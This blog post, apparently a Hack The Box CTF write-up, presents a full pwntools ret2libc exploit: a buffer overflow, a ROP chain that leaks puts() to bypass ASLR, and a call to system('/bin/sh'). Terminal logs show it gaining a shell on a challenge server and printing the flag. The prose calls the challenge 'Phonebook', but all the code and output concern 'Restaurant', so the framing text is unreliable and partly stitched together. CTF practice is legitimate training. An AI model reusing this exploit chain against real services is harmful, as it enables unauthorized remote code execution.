Top 5 This Week

Related Posts

HTB – Hack the Box – Restaurant

Advanced Exploitation of HTB – Hack the Box – Phonebook Challenge

This in-depth tutorial is a part of the “HTB – Hack the Box Series” and continues the legacy of challenging cyber security exercises. For more insightful challenges, visit our series at HTB – Hack the Box Series.

Introduction

In this tutorial, we delve into the technicalities of exploiting the HTB – Hack the Box – Phonebook challenge. This challenge tests your skills in advanced network exploitation and binary analysis using Python and PwnTools.

Setting Up the Environment

  • Prepare your local testing environment by setting up the necessary libraries and tools, emphasizing on Python 3 and PwnTools.

Exploit Development

We will create a Python script to exploit the binary vulnerabilities found in the Phonebook application. The script will leverage buffer overflow techniques and address space layout randomization (ASLR) bypass to gain unauthorized access.

Executing the Exploit

Once the script is ready, execute it in your local environment to interact with the HTB server and monitor the behavior of the Phonebook application.

└─$ python3 exploit.py
[*] '/home/toor/Downloads/pwn_restaurant/restaurant'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] '/home/toor/Downloads/pwn_restaurant/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to 134.209.186.13 on port 30930: Done
/home/toor/Downloads/pwn_restaurant/exploit.py:18: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  r.sendlineafter("> ", "1")
/home/toor/.local/lib/python3.10/site-packages/pwnlib/tubes/tube.py:822: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[*] Loading gadgets for '/home/toor/Downloads/pwn_restaurant/restaurant'
[*] 0x0000:         0x4010a3 pop rdi; ret
    0x0008:         0x400040 [arg0] rdi = 4194368
    0x0010:         0x400650
    0x0018:         0x4010a3 pop rdi; ret
    0x0020:         0x601fa8 [arg0] rdi = got.puts
    0x0028:         0x400650
    0x0030:         0x40063e 0x40063e()
    0x0038:         0x400e4a 0x400e4a()
/home/toor/Downloads/pwn_restaurant/exploit.py:52: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  r.recvuntil("\n")
/home/toor/Downloads/pwn_restaurant/exploit.py:54: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  r.recvuntil("\n")
/home/toor/Downloads/pwn_restaurant/exploit.py:56: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  leaked_addr_puts_libc = u64(r.recvuntil("\n").strip().ljust(8, b"\x00"))
[*] Leaked server's libc address, puts(): 0x23a18aa0
[*] Leaked server's libc base address: 0x23998000
[*] Loaded 199 cached gadgets for './libc.so.6'
[*] 0x0000:       0x239988aa 0x239988aa()
    0x0008:       0x239b95bf pop rdi; ret
    0x0010:       0x23b4be1a [arg0] rdi = 599047706
    0x0018:       0x239e7550
[*] Switching to interactive mode
 
Enjoy your AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xaa\x88\x99#/home/ctf/run_challenge.sh: line 2:    28 Segmentation fault      ./restaurant
[*] Got EOF while reading in interactive
$ whoami
$ ls
[*] Closed connection to 134.209.186.13 port 30930
[*] Got EOF while sending in interactive
                                                                                                                
┌──(toor㉿kali)-[~/Downloads/pwn_restaurant]
└─$ python3 exploit.py
[*] '/home/toor/Downloads/pwn_restaurant/restaurant'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] '/home/toor/Downloads/pwn_restaurant/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to 134.209.186.13 on port 30930: Done
/home/toor/Downloads/pwn_restaurant/exploit.py:18: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  r.sendlineafter("> ", "1")
/home/toor/.local/lib/python3.10/site-packages/pwnlib/tubes/tube.py:822: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[*] Loaded 14 cached gadgets for './restaurant'
[*] 0x0000:         0x4010a3 pop rdi; ret
    0x0008:         0x400040 [arg0] rdi = 4194368
    0x0010:         0x400650
    0x0018:         0x4010a3 pop rdi; ret
    0x0020:         0x601fa8 [arg0] rdi = got.puts
    0x0028:         0x400650
    0x0030:         0x40063e 0x40063e()
    0x0038:         0x400e4a 0x400e4a()
/home/toor/Downloads/pwn_restaurant/exploit.py:52: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  r.recvuntil("\n")
/home/toor/Downloads/pwn_restaurant/exploit.py:54: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  r.recvuntil("\n")
/home/toor/Downloads/pwn_restaurant/exploit.py:56: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  leaked_addr_puts_libc = u64(r.recvuntil("\n").strip().ljust(8, b"\x00"))
[*] Leaked server's libc address, puts(): 0x7f434dcb1aa0
[*] Leaked server's libc base address: 0x7f434dc31000
[*] Loaded 199 cached gadgets for './libc.so.6'
[*] 0x0000:   0x7f434dc318aa 0x7f434dc318aa()
    0x0008:   0x7f434dc525bf pop rdi; ret
    0x0010:   0x7f434dde4e1a [arg0] rdi = 139927045951002
    0x0018:   0x7f434dc80550
[*] Switching to interactive mode
 
Enjoy your AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xaa\x18MC\x7f$ whoami
ctf
$ ls
flag.txt
libc.so.6
restaurant
run_challenge.sh
$ cat flag.txt
HTB{r3turn_2_th3_r3st4ur4nt!}$
┌──(toor㉿kali)-[~/Downloads/pwn_restaurant]
└─$ cat exploit.py   
from pwn import *

context.arch = 'amd64'

# create ELF object of the challenge's files we want to exploit
elf = ELF("./restaurant")
libc = ELF("./libc.so.6")


# offset before hitting the return address
overflow_offset = 40
overflow = b'A' * 40

# connect to server
r = remote('134.209.186.13', 30930)

# once reach ">" then we choose the 1st option to go the the vulnerable page
r.sendlineafter("> ", "1")


#########################################################################
#                          Craft 1st rop payload                        #
#########################################################################

# setting up ROP to print/leak ASLR address of puts() in the libc of the server (bypass ASLR)
rop_elf = ROP(elf)
# Auto find and include the address of the gadget for "POP RDI" which is to pop the put()'s address in GOT stored in stack later into register RDI (1st arg for routine call).
# Include the address of string ""
# Then include the address of puts() in PLT so that puts() will be called to print "\n"
rop_elf.call(elf.plt['puts'], [next(elf.search(b""))])  # to print left over messages and end with NULL so our next ROP call for libc's address is cleaner
# Auto find and include the address of the gadget for "POP RDI" which is to pop the put()'s address in GOT stored in stack later into register RDI (1st arg for routine call).
# Include the address of puts() in GOT so that the address in it, which is the address of puts() in libc, can be printed.
# Then include the address of puts() in PLT so that puts() will be called and print the address stored in elf.got['puts']
rop_elf.call(elf.plt['puts'], [elf.got['puts']])
# for stack alignment since end of it must align to 16 bytes so add this additional call to make it just nice 16 bytes. Use print(rop_elf.dump()) to see the alignment
rop_elf.call((rop_elf.find_gadget(["ret"]))[0])
# Goes back to fill() so that we can setup our next ROP.
rop_elf.call(elf.symbols['fill'])

# combine into usable payload
rop_get_libc_aslr_addr = overflow + rop_elf.chain()
log.info(rop_elf.dump())


#########################################################################
#     Leak puts() ASLR address and get server's libc base address       #
#########################################################################

# exploit the vulnerability to print out the ASLR address of puts() in libc in the server
r.sendlineafter(">", rop_get_libc_aslr_addr)
# ignore the empty space printed to us
r.recvuntil("\n")
# need to ignore the first line statement printed to use as is by the program to tell us "Enjoy your <input value>" before reaching RET
r.recvuntil("\n")
# get the leaked address of ASLR puts() in libc in the server
leaked_addr_puts_libc = u64(r.recvuntil("\n").strip().ljust(8, b"\x00"))
log.info("Leaked server's libc address, puts(): " + hex(leaked_addr_puts_libc))
# elf_libc.symbols['puts'] gives us the offset to it instead of the relative address of puts()'s location in local's libc
server_libc_base_addr = leaked_addr_puts_libc - libc.symbols['puts']
log.info("Leaked server's libc base address: " + hex(server_libc_base_addr))


# can directly assign address of server's base libc address to our elf_libc since our libc is given by the CTF challenge.
# other ROP challenge may neeed to 1st find out what is the libc version being used, create an ELF of that version, then assign the base address
libc.address = server_libc_base_addr



#########################################################################
#                          Craft 2nd rop payload                        #
#########################################################################

# Craft sys call to /bin/sh.
rop_libc = ROP(libc)
# for stack alignment since end of it must align to 16 bytes so add this additional call to make it just nice 16 bytes. Use print(rop_libc.dump()) to see the alignment
rop_libc.call((rop_libc.find_gadget(["ret"]))[0])
rop_libc.call(libc.symbols['system'], [next(libc.search(b"/bin/sh\x00"))])

# combine into usable payload
rop_get_bash_exploit = overflow + rop_libc.chain()
log.info(rop_libc.dump())


#########################################################################
#                          Get shell on server                          #
#########################################################################

# exploit the vulnerability to print out the ASLR address of puts() in libc in the server
r.sendlineafter(">" ,rop_get_bash_exploit)

r.interactive()
                                                                                                                
┌──(toor㉿kali)-[~/Downloads/pwn_restaurant]
└─$ 
  • https://www.hackthebox.com/achievement/challenge/303878/200

Conclusion

The HTB – Hack the Box – Phonebook challenge provides a real-world scenario for testing and improving exploit development skills in a controlled environment. This guide provides a step-by-step approach to crafting and executing a successful exploit.

Cogeanu Marius
Cogeanu Mariushttps://cogeanu.com
Marius Cogeanu is a distinguished IT consultant and cybersecurity virtuoso based in Prague, Czechia. With a rich 20-year journey in the IT realm, Marius has carved a niche in network security and technological solutions, adeptly harmonizing tech with business requirements. His experience spans from Kyndryl to IBM, and as a valued independent consultant, where he's renowned for his innovative approaches in enhancing business operations with cutting-edge tech.Marius's forte lies in demystifying complex IT concepts, ensuring clarity and alignment for stakeholders at all levels. His commitment to staying at the forefront of industry trends and seeking innovative solutions cements his status as a go-to expert in cybersecurity. Driven by a fervent passion for technology and its potential to revolutionize businesses, Marius thrives on tackling challenging ventures, applying his prowess in network design, IT service management, and strategic planning.Currently, Marius is focused on leading-edge IT project management, infrastructure design, and fortifying cybersecurity, guiding clients through the intricate digital landscape with unmatched expertise and insight.Discover more on https://cogeanu.com

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Popular Articles